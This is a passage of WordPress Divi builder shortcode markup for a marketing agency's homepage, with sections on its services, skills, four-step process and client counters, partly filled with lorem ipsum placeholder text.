do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|1px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|-5px|56px|21px||\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|||21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde 